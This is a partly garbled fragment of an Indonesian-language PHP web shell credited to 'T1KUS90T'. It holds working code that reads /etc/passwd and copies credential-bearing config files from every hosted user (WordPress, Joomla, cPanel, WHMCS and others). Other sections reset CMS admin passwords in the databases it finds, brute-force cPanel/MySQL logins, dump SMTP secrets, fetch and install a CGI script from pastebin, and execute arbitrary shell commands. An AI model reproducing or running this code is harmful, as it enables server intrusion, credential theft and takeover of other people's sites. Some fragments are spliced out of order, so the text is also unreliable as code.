Zip Backup
"; if($_POST['backup']){ $save=$_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'],$save); echo "Can't read /etc/passwd"); $tg = mkdir("tg_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("tg_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_tg) { $user_config_dir = "/home/$user_tg/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_tg/.my.cnf" => "cpanel", "/home/$user_tg/.accesshash" => "WHM-accesshash", "/home/$user_tg/public_html/po-content/config.php" => "Popoji", "/home/$user_tg/public_html/vdo_config.php" => "Voodoo", "/home/$user_tg/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_tg/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_tg/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_tg/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whm/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_tg/public_html/forum/config.php" => "phpBB", "/home/$user_tg/public_html/sites/default/settings.php" => "Drupal", "/home/$user_tg/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_tg/public_html/app/etc/local.xml" => "Magento", "/home/$user_tg/public_html/joomla/configuration.php" => "Joomla", "/home/$user_tg/public_html/configuration.php" => "Joomla", "/home/$user_tg/public_html/wp/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wp-config.php" => "WordPress", "/home/$user_tg/public_html/admin/config.php" => "OpenCart", "/home/$user_tg/public_html/slconfig.php" => "Sitelok", "/home/$user_tg/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("tg_config/$user_tg-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "
";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "
';
}
} elseif(preg_match("/vhosts/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "
';
}
} else {
echo "
";
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."";
foreach($urls as $url) {
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if(is_dir($dir_user) === true) {
$url_user = $dir_user."/".$url;
if(is_readable($url_user)) {
$i++;
$jrw = "[R] $url_user";
if(is_writable($url_user)) {
$jrw = "[RW] $url_user";
}
echo $jrw."
";
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
} else {
echo '";
foreach($urls as $url) {
$web_vh = "/var/www/vhosts/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = "[R] $web_vh";
if(is_writable($web_vh)) {
$jrw = "[RW] $web_vh";
}
echo $jrw."
";
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
} else {
echo '";
$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "Can't read /etc/passwd";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_tg_jump) {
$user_jumping_dir = "/home/$user_tg_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[R] $user_jumping_dir";
if(is_writable($user_jumping_dir)) {
$jrw = "[RW] $user_jumping_dir";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( gabisa ambil nama domain nya )
";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_tg_jump) {
echo " => ( $dj )
";
break;
}
}
}
} else {
echo "
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
}
echo ""; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,"
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."
"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
"; } mysql_close($conn); } } } } else { echo "
Auto Edit User Config
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { } else { $i++; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { $dom = "gabisa ambil nama domain nya"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { $dom = "$dj"; break; } } } } else { $dom = "function is Disable by system"; } echo "username ($ucp) password ($pcp) domain ($dom)
"; } } } } } if($i == 0) { } else { echo "
sukses nyolong ".$i." Cpanel by T1KUS90T."; } } else { echo "
"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure
"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('tg_cgi', 0755); $file_cgi = "tg_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET['do'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
"; } echo ""; } elseif($_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = ""; } else { $act = "could not remove ".basename($dir).""; } } echo $act; } elseif($_GET['act'] == 'view') { echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ chmod ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "Saved!"; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ chmod ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'rename') { if($_POST['do_rename']) { $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ chmod ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'chmod') { $mode = $_POST['mode']; if($_POST['do_chmod']) { $chmod = @chmod($_GET['file'], $mode); if($chmod) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ chmod ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; } else { if(is_dir($dir) === true) { if(!is_readable($dir)) { echo "can't open directory. ( not readable )"; } else { echo '
![](data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=) $href | ";
echo "$act_dir | "; echo "|||||
 $file | ";
echo "edit | rename | delete | chmod | download | "; echo "
"; } echo "
| ";
echo " "; if($_POST['do_cmd']) { echo " ".exe($_POST['cmd']).""; echo " | ";
echo"